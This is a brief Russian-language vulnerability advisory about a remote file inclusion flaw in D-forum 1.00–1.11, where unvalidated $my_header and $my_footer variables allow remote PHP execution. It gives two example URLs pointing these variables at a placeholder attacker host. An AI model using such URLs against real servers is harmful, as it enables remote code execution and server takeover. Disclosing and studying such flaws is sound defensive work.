Уязвимость включения файла обнаружена в D-forum. Удаленный пользователь может выполнять произвольные команды на операционной системе.
Файл header.php3 включает переменную $my_header и файл
footer.php3 включает $my_footer переменную без надлежащей проверки.
В результате удаленный атакующий может сконструировать URL, который
определит удаленное местоположение для $my_header или $my_footer. PHP код, на который ссылаются эти переменные, будет включен и выполнен целевым сервером. Пример:
http://[target]/includes/footer.php3? my_footer=http://[attacker]/scriptt xt
http://[target]/includes/header.php3? my_header=http://[attacker]/scripttxt
Уязвимость обнаружена в D-forum 1.00 - 1.11; version 1.11 before November 23, 2002.
